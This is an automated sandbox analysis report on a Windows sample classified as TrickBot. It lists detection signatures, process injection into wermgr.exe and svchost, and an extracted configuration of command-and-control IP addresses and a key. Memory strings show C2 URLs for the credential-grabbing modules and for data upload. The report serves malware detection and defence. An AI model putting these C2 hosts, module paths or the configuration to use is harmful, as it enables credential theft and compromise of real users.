Loading ...

Play interactive tourEdit tour

Windows Analysis Report dngqoAXyDd.exe

Overview

General Information

Sample Name:dngqoAXyDd.exe
Analysis ID:516930
MD5:0afbb383c5cea9f11202d572141bb0f4
SHA1:148266112b25087f10ac1124ea32630e48fb0bd9
SHA256:6a910ec8055b3844e3dd14c7af08a68110abc9395a88ab9199e69ed07be27210
Infos:

Most interesting Screenshot:

Detection

TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Multi AV Scanner detection for submitted file
Found detection on Joe Sandbox Cloud Basic with higher score
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
Hijacks the control flow in another process
May check the online IP address of the machine
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • dngqoAXyDd.exe (PID: 9000 cmdline: "C:\Users\user\Desktop\dngqoAXyDd.exe" MD5: 0AFBB383C5CEA9F11202D572141BB0F4)
    • wermgr.exe (PID: 5016 cmdline: C:\Windows\system32\wermgr.exe MD5: F7991343CF02ED92CB59F394E8B89F1F)
      • svchost.exe (PID: 1728 cmdline: C:\Windows\system32\svchost.exe MD5: F586835082F632DC8D9404D83BC16316)
    • cmd.exe (PID: 2076 cmdline: C:\Windows\system32\cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 6472 cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\GNU-Rach-559H\cmdrun.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "100019", "gtag": "top147", "servs": ["65.152.201.203:443", "185.56.175.122:443", "46.99.175.217:443", "179.189.229.254:443", "46.99.175.149:443", "181.129.167.82:443", "216.166.148.187:443", "46.99.188.223:443", "128.201.76.252:443", "62.99.79.77:443", "60.51.47.65:443", "24.162.214.166:443", "45.36.99.184:443", "97.83.40.67:443", "184.74.99.214:443", "103.105.254.17:443", "62.99.76.213:443", "82.159.149.52:443"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAABbfmkJRvwyw7iFkX40hL2HwsUeOSZZZo0FRRWGkY6J1+gf3YKq13Ee4sY3Jb9/0myCr0MwzNK1K2l5yuY87nW29Q/yjMJG0ISDj0HNBC3G+ZGta6Oi9QkjCwnNGbw2hQ4="}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    Process Memory Space: wermgr.exe PID: 5016JoeSecurity_Trickbot_1Yara detected TrickbotJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Suspect Svchost ActivityShow sources
      Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\wermgr.exe, ParentImage: C:\Windows\System32\wermgr.exe, ParentProcessId: 5016, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 1728
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\wermgr.exe, ParentImage: C:\Windows\System32\wermgr.exe, ParentProcessId: 5016, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 1728

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "100019", "gtag": "top147", "servs": ["65.152.201.203:443", "185.56.175.122:443", "46.99.175.217:443", "179.189.229.254:443", "46.99.175.149:443", "181.129.167.82:443", "216.166.148.187:443", "46.99.188.223:443", "128.201.76.252:443", "62.99.79.77:443", "60.51.47.65:443", "24.162.214.166:443", "45.36.99.184:443", "97.83.40.67:443", "184.74.99.214:443", "103.105.254.17:443", "62.99.76.213:443", "82.159.149.52:443"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAABbfmkJRvwyw7iFkX40hL2HwsUeOSZZZo0FRRWGkY6J1+gf3YKq13Ee4sY3Jb9/0myCr0MwzNK1K2l5yuY87nW29Q/yjMJG0ISDj0HNBC3G+ZGta6Oi9QkjCwnNGbw2hQ4="}
      Yara detected TrickbotShow sources
      Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
      Source: Yara matchFile source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY
      Multi AV Scanner detection for submitted fileShow sources
      Source: dngqoAXyDd.exeVirustotal: Detection: 27%Perma Link
      Source: dngqoAXyDd.exeReversingLabs: Detection: 28%
      Source: dngqoAXyDd.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: unknownHTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2
      Source: dngqoAXyDd.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: c:\sample exe lego\correctmodel.pdb source: dngqoAXyDd.exe
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECD0960 FindFirstFileW,FindNextFileW,
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC7120 FindFirstFileW,FindNextFileW,
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp dword ptr [eax], ecx
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov byte ptr [esp+ecx+70h], cl
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ebp
      Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, byte ptr [ebp-07h]

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.11.20:49778 -> 46.99.175.217:443
      Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.11.20:49809 -> 103.75.32.173:443
      May check the online IP address of the machineShow sources
      Source: unknownDNS query: name: ip.anysrc.net
      Source: Joe Sandbox ViewASN Name: IPKO-ASAL IPKO-ASAL
      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
      Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
      Source: Joe Sandbox ViewIP Address: 46.99.175.217 46.99.175.217
      Source: Joe Sandbox ViewIP Address: 116.203.16.95 116.203.16.95
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sat, 06 Nov 2021 14:12:52 GMTContent-Length: 9Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.14.2Date: Sat, 06 Nov 2021 14:14:12 GMTContent-Length: 9Connection: close
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: unknownTCP traffic detected without corresponding DNS query: 46.99.175.217
      Source: Cookies.bak.13.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
      Source: Cookies.bak.13.drString found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
      Source: Cookies.bak.13.drString found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://103.11.218.199:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://103.111.83.86:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://103.75.32.173:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://110.38.58.198:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://114.7.243.26:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://116.206.62.138:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://117.54.140.98:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://138.94.162.29:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://139.255.41.122:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://175.184.232.234:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://186.96.153.223:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://190.183.60.164:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://196.44.109.73:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://202.152.56.10:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://206.251.37.27:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://27.109.116.144:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://36.95.73.109:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://45.115.174.234:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://45.115.174.60:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://45.116.68.109:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://45.221.8.171:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://64.64.150.203:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp, wermgr.exe, 00000003.00000002.14252607616.0000017631B36000.00000004.00000040.sdmpString found in binary or memory: http://80.210.26.17:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://96.9.69.207:443
      Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmpString found in binary or memory: http://96.9.74.169:443
      Source: History.bak.13.drString found in binary or memory: http://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=lib
      Source: History.bak.13.drString found in binary or memory: http://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=libDriver
      Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: wermgr.exe, 00000003.00000003.10158119791.000001767EE18000.00000004.00000001.sdmpString found in binary or memory: http://ip.anysrc.net/
      Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmpString found in binary or memory: http://ip.anysrc.net/plain
      Source: History.bak.13.drString found in binary or memory: http://office.com/setup
      Source: History.bak.13.drString found in binary or memory: http://packetstormsecurity.com/files/22459/BIOS320.EXE.html
      Source: History.bak.13.drString found in binary or memory: http://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=
      Source: History.bak.13.drString found in binary or memory: http://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=Driver
      Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://202.58.199.82/S/6a
      Source: wermgr.exe, 00000003.00000003.10158605588.000001767EE77000.00000004.00000001.sdmpString found in binary or memory: https://202.58.199.82/roviderg/
      Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000003.10158605588.000001767EE77000.00000004.00000001.sdmpString found in binary or memory: https://202.58.199.82/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/
      Source: wermgr.exe, 00000003.00000002.14258955412.000001767EEA2000.00000004.00000020.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://202.58.199.82/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/
      Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmpString found in binary or memory: https://202.58.199.82:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/
      Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmpString found in binary or memory: https://202.58.199.82:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/
      Source: wermgr.exe, 00000003.00000002.14257936566.000001767EDF4000.00000004.00000020.sdmpString found in binary or memory: https://24.4
      Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmpString found in binary or memory: https://24.45.255.9/
      Source: wermgr.exe, 00000003.00000003.9460440503.000001767EE9B000.00000004.00000001.sdmpString found in binary or memory: https://24.45.255.9/index.html
      Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmpString found in binary or memory: https://24.45.255.9:443/index.html
      Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmpString found in binary or memory: https://24.45.255.9:443/login.cgi?uri=/index.html#
      Source: wermgr.exe, 00000003.00000002.14255875326.00000176321EA000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/
      Source: wermgr.exe, 00000003.00000002.14257724203.000001767EDDE000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/rovider
      Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/roviders/
      Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/roviderw/
      Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/
      Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/g
      Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/t
      Source: wermgr.exe, 00000003.00000003.10158119791.000001767EE18000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000003.9460390964.000001767EE92000.00000004.00000001.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/NAT%20status/clien
      Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//
      Source: wermgr.exe, 00000003.00000002.14257936566.000001767EDF4000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//0u0u
      Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//Q
      Source: wermgr.exe, 00000003.00000002.14257825391.000001767EDE7000.00000004.00000020.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmpString found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/VERS//
      Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmpString found in binary or memory: https://46.99.175.217:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/dpost/
      Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmpString found in binary or memory: https://46.99.175.217:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//
      Source: Web Data.bak.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: History.bak.13.drString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
      Source: History.bak.13.drString found in binary or memory: https://aka.office.com/office/url/setup
      Source: History.bak.13.drString found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
      Source: History.bak.13.drString found in binary or memory: https://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=lib
      Source: History.bak.13.drString found in binary or memory: https://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=libDriver
      Source: History.bak.13.drString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
      Source: Web Data.bak.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: History.bak.13.drString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
      Source: History.bak.13.drString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
      Source: History.bak.13.drString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
      Source: Web Data.bak.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: Web Data.bak.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: Web Data.bak.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: wermgr.exe, 00000003.00000003.9460033673.00000176321DB000.00000004.00000001.sdmpString found in binary or memory: https://itunes.apple.com/us/app/umobile-ubnt/id1183022489?mt=8
      Source: History.bak.13.drString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
      Source: Login Data.bak.13.drString found in binary or memory: https://login.live.com/
      Source: Login Data.bak.13.drString found in binary or memory: https://login.live.com//
      Source: Login Data.bak.13.drString found in binary or memory: https://login.live.com/https://login.live.com/
      Source: History.bak.13.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
      Source: History.bak.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
      Source: History.bak.13.drString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
      Source: Login Data.bak.13.drString found in binary or memory: https://login.live.com/v104
      Source: History.bak.13.drString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
      Source: History.bak.13.drString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
      Source: History.bak.13.drString found in binary or memory: https://office.com/setup
      Source: History.bak.13.drString found in binary or memory: https://office.com/setupMicrosoft
      Source: History.bak.13.drString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
      Source: History.bak.13.drString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlBIOS320.EXE
      Source: History.bak.13.drString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
      Source: History.bak.13.drString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXEDownload:
      Source: History.bak.13.drString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
      Source: wermgr.exe, 00000003.00000003.9460033673.00000176321DB000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.ubnt.umobile
      Source: History.bak.13.drString found in binary or memory: https://recoveringlib.blogspot.com/2015/04/bios320exe-64-bit.html
      Source: History.bak.13.drString found in binary or memory: https://recoveringlib.blogspot.com/2015/04/bios320exe-64-bit.htmlBios320.Exe
